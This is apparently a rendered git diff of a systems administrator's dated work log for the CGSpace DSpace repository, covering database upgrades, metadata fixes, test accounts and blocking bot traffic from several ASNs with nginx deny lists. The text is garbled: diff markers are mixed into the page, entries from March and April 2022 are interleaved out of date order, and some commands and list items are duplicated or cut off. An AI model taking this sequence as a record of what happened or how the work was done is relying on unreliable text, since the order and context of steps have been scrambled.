<li>I extracted the IPv4 and IPv6 networks:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | grep <span style="color:#e6db74">&#34;:&#34;</span> | sort &gt; /tmp/ipv6-networks.txt
</span></span><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | grep -v <span style="color:#e6db74">&#34;:&#34;</span> | sort &gt; /tmp/ipv4-networks.txt
</span></span></code></pre></div><ul>
<li>I suspect we need to aggregate these networks since they are so many and nftables doesn&rsquo;t like it when they overlap:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wc -l /tmp/ipv4-networks.txt
</span></span><span style="display:flex;"><span>15464 /tmp/ipv4-networks.txt
</span></span><span style="display:flex;"><span>$ aggregate6 /tmp/ipv4-networks.txt | wc -l
</span></span><span style="display:flex;"><span>2781
</span></span><span style="display:flex;"><span>$ wc -l /tmp/ipv6-networks.txt
</span></span><span style="display:flex;"><span>4833 /tmp/ipv6-networks.txt
</span></span><span style="display:flex;"><span>$ aggregate6 /tmp/ipv6-networks.txt | wc -l
</span></span><span style="display:flex;"><span>338
</span></span></code></pre></div><ul>
<li>I deployed these lists on CGSpace, ran all updates, and rebooted the server
<li>Paola from ABC said they are decomissioning the server where many of their library PDFs are hosted
<ul>
<li>This list is SURELY too broad because we will block legitimate users in China&hellip; but right now how can I discern?</li>
<li>Also, I need to purge the hits from these 14,000 IPs in Solr when I get time</li>
<li>She asked if we can download them and upload them directly to CGSpace</li>
</ul>
</li>
<li>Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:</li>
</ul>
<p><img src="/cgspace-notes/2022/04/postgres_connections_ALL-day.png" alt="PostgreSQL connections day">
<img src="/cgspace-notes/2022/04/jmx_dspace_sessions-day.png" alt="DSpace sessions day"></p>
<li>I re-created my local Artifactory container</li>
<li>I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately
<ul>
<li>I used <code>grepcidr</code> with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:</li>
<li>One thing I realized is that OAI is no longer a standalone web application, it is part of the <code>server</code> app now: http://localhost:8080/server/oai/request?verb=Identify</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort -u &gt; /tmp/ips.log
</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">while</span> read -r network; <span style="color:#66d9ef">do</span> grepcidr $network /tmp/ips.log &gt;&gt; /tmp/ipv4-ips.txt; <span style="color:#66d9ef">done</span> &lt; /tmp/ipv4-networks-aggregated.txt
</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">while</span> read -r network; <span style="color:#66d9ef">do</span> grepcidr $network /tmp/ips.log &gt;&gt; /tmp/ipv6-ips.txt; <span style="color:#66d9ef">done</span> &lt; /tmp/ipv6-networks-aggregated.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/ipv4-ips.txt
</span></span><span style="display:flex;"><span>15313 /tmp/ipv4-ips.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/ipv6-ips.txt
</span></span><span style="display:flex;"><span>19 /tmp/ipv6-ips.txt
</span></span></code></pre></div><ul>
<li>Then I purged them from Solr using the <code>check-spider-ip-hits.sh</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
</span></span></code></pre></div><h2 id="2022-04-23">2022-04-23</h2>
</li>
<li>Deploy PostgreSQL 12 on CGSpace (linode18) but don&rsquo;t switch over yet, because I see some users active
<ul>
<li>A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the <code>example</code> file that contains most patterns
<ul>
<li>I updated CGSpace, then ran all system updates and rebooted the host</li>
<li>I also ran <code>dspace cleanup -v</code> to prune the database</li>
<li>I did this on DSpace Test in 2022-02 so I just followed the same procedure</li>
<li>After that I ran all system updates and rebooted the server</li>
</ul>
</li>
</ul>
<h2 id="2022-04-24">2022-04-24</h2>
<h2 id="2022-03-25">2022-03-25</h2>
<ul>
<li>Looking at the PostgreSQL database size on CGSpace after the update yesterday:</li>
</ul>
<p><img src="/cgspace-notes/2022/03/postgres_size_cgspace-day.png" alt="PostgreSQL database size day"></p>
<ul>
<li>The space saving in indexes of recent PostgreSQL releases is awesome!</li>
<li>Import a DSpace 6.x database dump from production into my local DSpace 7 database
<ul>
<li>I see I still the same errors <a href="/cgspace-notes/2021-04/">I saw in 2021-04</a> when testing DSpace 7.0 beta 5</li>
<li>I had to delete some old migrations, as well as all Atmire ones first:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN (&#39;5.0.2017.09.25&#39;, &#39;6.0.2017.01.30&#39;, &#39;6.0.2017.09.25&#39;);
</span></span><span style="display:flex;"><span>localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE &#39;%Atmire%&#39; OR description LIKE &#39;%CUA%&#39; OR description LIKE &#39;%cua%&#39;
</span></span></code></pre></div><ul>
<li>Then I was able to migrate to DSpace 7 with <code>dspace database migrate ignored</code> as the <a href="https://wiki.lyrasis.org/display/DSDOC7x/Upgrading+DSpace">DSpace upgrade notes say</a>
<ul>
<li>I see that the <a href="https://github.com/DSpace/dspace-angular/issues/1357">flash of unstyled content bug</a> still exists on dspace-angluar&hellip; ouch!</li>
</ul>
</li>
<li>Start a harvest on AReS</li>
</ul>
<h2 id="2022-04-25">2022-04-25</h2>
<h2 id="2022-03-26">2022-03-26</h2>
<ul>
<li>Looking at the countries on AReS I decided to collect a list to remind Jacquie at WorldFish again about how many incorrect ones they have
<li>Update dspace-statistics-api to Falcon 3.1.0 and <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.3">release v1.4.3</a></li>
</ul>
<h2 id="2022-03-28">2022-03-28</h2>
<ul>
<li>There are about sixty incorrect ones, some of which I can correct via the value mappings on AReS, but most I can&rsquo;t</li>
<li>I set up value mappings for seventeen countries, then sent another sixty or so to Jacquie and Salem to hopefully delete</li>
<li>Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:</li>
</ul>
</li>
<li>I notice we have over 1,000 items with region <code>Africa South of Sahara</code>
<ul>
<li>I am surprised to see these because we did a mass migration to <code>Sub-Saharan Africa</code> in 2020-10 when we aligned to UN M.49</li>
<li>Oh! It seems I used a capital O in <code>Of</code>!</li>
<li>This is curious, I see we missed <code>East Asia</code> and <code>Northern America</code>, because those are still in our list, but UN M.49 uses <code>Eastern Asia</code> and <code>Northern America</code>&hellip; I will have to raise that with Peter and Abenet later</li>
<li>For now I will just re-run my fixes:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/regions.csv
</span></span><span style="display:flex;"><span>cg.coverage.region,correct
</span></span><span style="display:flex;"><span>East Africa,Eastern Africa
</span></span><span style="display:flex;"><span>West Africa,Western Africa
</span></span><span style="display:flex;"><span>Southeast Asia,South-eastern Asia
</span></span><span style="display:flex;"><span>South Asia,Southern Asia
</span></span><span style="display:flex;"><span>Africa South of Sahara,Sub-Saharan Africa
</span></span><span style="display:flex;"><span>North Africa,Northern Africa
</span></span><span style="display:flex;"><span>West Asia,Western Asia
</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/regions.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.coverage.region -m <span style="color:#ae81ff">227</span> -t correct
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p <span style="color:#e6db74">&#39;fuuuuuuuu&#39;</span>
</span></span></code></pre></div><ul>
<li>Then I started a new harvest on AReS</li>
<li>I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
<ul>
<li>According to my notes from <a href="/cgspace-notes/2020-10/">2020-10</a> the account must be in the admin group in order to submit via the REST API</li>
</ul>
</li>
<li>Abenet and I noticed 1,735 items in CTA&rsquo;s community that have the title &ldquo;delete&rdquo;
<ul>
<li>We asked Peter and he said we should delete them</li>
<li>I exported the CTA community metadata and used OpenRefine to filter all items with the &ldquo;delete&rdquo; title, then used the &ldquo;expunge&rdquo; bulkedit action to remove them</li>
</ul>
</li>
<li>I realized I forgot to clean up the old Let&rsquo;s Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago
<ul>
<li>I also removed the pre-Ubuntu 20.04 Let&rsquo;s Encrypt stuff from the Ansble infrastructure playbooks</li>
</ul>
</li>
</ul>
<h2 id="2022-03-29">2022-03-29</h2>
<ul>
<li>Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents
<ul>
<li>I created a filter in LibreOffice and selected the IDs for items with the action &ldquo;delete&rdquo;, then I created a custom text facet in OpenRefine with this GREL:</li>
</ul>
</li>
</ul>
<pre tabindex="0"><code>or(
isNotNull(value.match(&#39;33&#39;)),
isNotNull(value.match(&#39;179&#39;)),
isNotNull(value.match(&#39;452&#39;)),
isNotNull(value.match(&#39;489&#39;)),
isNotNull(value.match(&#39;541&#39;)),
isNotNull(value.match(&#39;568&#39;)),
isNotNull(value.match(&#39;646&#39;)),
isNotNull(value.match(&#39;889&#39;))
)
</code></pre><ul>
<li>Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported the 692 items on CGSpace, and generated the thumbnails:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;</span>
</span></span><span style="display:flex;"><span>$ dspace import --add --eperson<span style="color:#f92672">=</span>umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-29-cgiar-tac.map
</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace filter-media -p <span style="color:#e6db74">&#34;ImageMagick PDF Thumbnail&#34;</span> -i 10947/50
</span></span></code></pre></div><ul>
<li>After that I did some normalization on the <code>cg.subject.system</code> metadata and extracted a few dozen countries to the country field</li>
<li>Start a harvest on AReS</li>
</ul>
<h2 id="2022-03-30">2022-03-30</h2>
<ul>
<li>Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p <span style="color:#e6db74">&#39;fuuuu&#39;</span>
</span></span></code></pre></div><ul>
<li>I started looking into the request regarding the CIAT Library PDFs
<ul>
<li>There are over 4,000 links to PDFs hosted on that server in CGSpace metadata</li>
<li>The links seem to be down though! I emailed Paola to ask</li>
</ul>
</li>
</ul>
<h2 id="2022-03-31">2022-03-31</h2>
<ul>
<li>Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC</li>
<li>I will do the following for CMS and G1GC on DSpace Test:
<ul>
<li>Wait for startup</li>
<li>Reload home page</li>
<li>Log in</li>
<li>Do a search for &ldquo;livestock&rdquo;</li>
<li>Click AGROVOC facet for livestock</li>
<li>dspace index-discovery -b</li>
<li>dspace-statistics-api index</li>
</ul>
</li>
<li>With CMS the Discovery Index took:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>real 379m19.245s
</span></span><span style="display:flex;"><span>user 267m17.704s
</span></span><span style="display:flex;"><span>sys 4m2.937s
</span></span></code></pre></div><ul>
<li>Leroy from CIAT said that the CIAT Library server has security issues so was limited to internal traffic
<ul>
<li>I extracted a list of URLs from CGSpace to send him:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ &#39;https?://ciat-library&#39;) to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 4552
</span></span></code></pre></div><ul>
<li>I did some checks and cleanups in OpenRefine because there are some values with &ldquo;#page&rdquo; etc
<ul>
<li>Once I sorted them there were only ~2,700, which means there are going to be almost two thousand items with duplicate PDFs</li>
<li>I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books</li>
</ul>
</li>
</ul>
<!-- raw HTML omitted -->
@ -344,9 +476,9 @@
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>

529
docs/2022-04/index.html Normal file
View File

@ -0,0 +1,529 @@
<!DOCTYPE html>
<html lang="en" >
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta property="og:title" content="April, 2022" />
<meta property="og:description" content="2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-04/" />
<meta property="article:published_time" content="2022-04-01T10:53:39+03:00" />
<meta property="article:modified_time" content="2022-04-27T08:44:10+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="April, 2022"/>
<meta name="twitter:description" content="2022-04-01 I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday The Discovery indexing took this long: real 334m33.625s user 227m51.331s sys 3m43.037s 2022-04-04 Start a full harvest on AReS Help Marianne with submit/approve access on a new collection on CGSpace Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc) Looking at the Solr statistics for 2022-03 on CGSpace I see 54."/>
<meta name="generator" content="Hugo 0.97.3" />
<script type="application/ld+json">
{
"@context": "http://schema.org",
"@type": "BlogPosting",
"headline": "April, 2022",
"url": "https://alanorth.github.io/cgspace-notes/2022-04/",
"wordCount": "1867",
"datePublished": "2022-04-01T10:53:39+03:00",
"dateModified": "2022-04-27T08:44:10+03:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
},
"keywords": "Notes"
}
</script>
<link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-04/">
<title>April, 2022 | CGSpace Notes</title>
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
</head>
<body>
<div class="blog-masthead">
<div class="container">
<nav class="nav blog-nav">
<a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
</nav>
</div>
</div>
<header class="blog-header">
<div class="container">
<h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
<p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
</div>
</header>
<div class="container">
<div class="row">
<div class="col-sm-8 blog-main">
<article class="blog-post">
<header>
<h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-04/">April, 2022</a></h2>
<p class="blog-post-meta">
<time datetime="2022-04-01T10:53:39+03:00">Fri Apr 01, 2022</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
</p>
</header>
<h2 id="2022-04-01">2022-04-01</h2>
<ul>
<li>I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday
<ul>
<li>The Discovery indexing took this long:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>real 334m33.625s
</span></span><span style="display:flex;"><span>user 227m51.331s
</span></span><span style="display:flex;"><span>sys 3m43.037s
</span></span></code></pre></div><h2 id="2022-04-04">2022-04-04</h2>
<ul>
<li>Start a full harvest on AReS</li>
<li>Help Marianne with submit/approve access on a new collection on CGSpace</li>
<li>Go back in Gaia&rsquo;s batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc)</li>
<li>Looking at the Solr statistics for 2022-03 on CGSpace
<ul>
<li>I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of which with this user agent: <code>Apache-HttpClient/4.5.9 (Java/1.8.0_322)</code>, and many others with a normal browser agent, so that&rsquo;s fishy!</li>
<li>The DSpace agent pattern <code>http.?agent</code> seems to have caught the first ones, but I&rsquo;ll purge the IP ones</li>
<li>I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for <code>dns:*msnbot* AND dns:*.msn.com.</code> I see over 100,000, which is a problem I noticed a few months ago too&hellip;</li>
<li>I extracted the MSN Bot IPs from Solr using an IP facet, then used the <code>check-spider-ip-hits.sh</code> script to purge them</li>
</ul>
</li>
</ul>
<h2 id="2022-04-10">2022-04-10</h2>
<ul>
<li>Start a full harvest on AReS</li>
</ul>
<h2 id="2022-04-13">2022-04-13</h2>
<ul>
<li>UptimeRobot mailed to say that CGSpace was down
<ul>
<li>I looked and found the load at 44&hellip;</li>
</ul>
</li>
<li>There seem to be a lot of locks from the XMLUI:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi)&#39;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 3173 dspaceWeb
</span></span></code></pre></div><ul>
<li>Looking at the top IPs in nginx&rsquo;s access log one IP in particular stands out:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span> 941 66.249.66.222
</span></span><span style="display:flex;"><span> 1224 95.108.213.28
</span></span><span style="display:flex;"><span> 2074 157.90.209.76
</span></span><span style="display:flex;"><span> 3064 66.249.66.221
</span></span><span style="display:flex;"><span> 95743 185.192.69.15
</span></span></code></pre></div><ul>
<li>185.192.69.15 is in the UK</li>
<li>I added a block for that IP in nginx and the load went down&hellip;</li>
</ul>
<h2 id="2022-04-16">2022-04-16</h2>
<ul>
<li>Start harvest on AReS</li>
</ul>
<h2 id="2022-04-18">2022-04-18</h2>
<ul>
<li>I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I&rsquo;m on holiday out of the country for Easter)
<ul>
<li>I see there are many locks in use from the XMLUI:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi)&#39;</span> | sort | uniq -c
</span></span><span style="display:flex;"><span> 8932 dspaceWeb
</span></span></code></pre></div><ul>
<li>Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -h
</span></span><span style="display:flex;"><span> 752 69.162.124.231
</span></span><span style="display:flex;"><span> 759 66.249.64.213
</span></span><span style="display:flex;"><span> 864 66.249.66.222
</span></span><span style="display:flex;"><span> 905 2a01:4f8:221:f::2
</span></span><span style="display:flex;"><span> 1013 84.33.2.97
</span></span><span style="display:flex;"><span> 1201 157.55.39.159
</span></span><span style="display:flex;"><span> 1204 157.55.39.144
</span></span><span style="display:flex;"><span> 1209 157.55.39.102
</span></span><span style="display:flex;"><span> 1217 157.55.39.161
</span></span><span style="display:flex;"><span> 1252 207.46.13.177
</span></span><span style="display:flex;"><span> 1274 157.55.39.162
</span></span><span style="display:flex;"><span> 2553 66.249.66.221
</span></span><span style="display:flex;"><span> 2941 95.108.213.28
</span></span></code></pre></div><ul>
<li>One IP is using a stange user agent though:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] &#34;GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1&#34; 404 10890 &#34;-&#34; &#34;SomeRandomText&#34;
</span></span></code></pre></div><ul>
<li>Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and log file rolled over at 00:00):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>17314
</span></span></code></pre></div><ul>
<li>That&rsquo;s a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each
<ul>
<li>The ISPs I&rsquo;ve seen so far are ChinaNet and China Unicom</li>
</ul>
</li>
<li>I extracted all the IPs from today and resolved them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/2022-04-18-ips.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv
</span></span></code></pre></div><ul>
<li>The top ASNs by IP are:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">2</span> /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span> 102 GOOGLE
</span></span><span style="display:flex;"><span> 139 Maxihost LTDA
</span></span><span style="display:flex;"><span> 165 AMAZON-02
</span></span><span style="display:flex;"><span> 393 &#34;China Mobile Communications Group Co., Ltd.&#34;
</span></span><span style="display:flex;"><span> 473 AMAZON-AES
</span></span><span style="display:flex;"><span> 616 China Mobile communications corporation
</span></span><span style="display:flex;"><span> 642 M247 Ltd
</span></span><span style="display:flex;"><span> 2336 HostRoyale Technologies Pvt Ltd
</span></span><span style="display:flex;"><span> 4556 Chinanet
</span></span><span style="display:flex;"><span> 5527 CHINA UNICOM China169 Backbone
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">4</span> /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span> 139 262287
</span></span><span style="display:flex;"><span> 165 16509
</span></span><span style="display:flex;"><span> 180 204287
</span></span><span style="display:flex;"><span> 393 9808
</span></span><span style="display:flex;"><span> 473 14618
</span></span><span style="display:flex;"><span> 615 56041
</span></span><span style="display:flex;"><span> 642 9009
</span></span><span style="display:flex;"><span> 2156 203020
</span></span><span style="display:flex;"><span> 4556 4134
</span></span><span style="display:flex;"><span> 5527 4837
</span></span></code></pre></div><ul>
<li>I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and HTML sitemap etc</li>
<li>I will download the IP blocks for each ASN except Google and Amazon and ban them</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
</span></span><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>20296
</span></span></code></pre></div><ul>
<li>I extracted the IPv4 and IPv6 networks:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | grep <span style="color:#e6db74">&#34;:&#34;</span> | sort &gt; /tmp/ipv6-networks.txt
</span></span><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | grep -v <span style="color:#e6db74">&#34;:&#34;</span> | sort &gt; /tmp/ipv4-networks.txt
</span></span></code></pre></div><ul>
<li>I suspect we need to aggregate these networks since they are so many and nftables doesn&rsquo;t like it when they overlap:</li>
</ul>
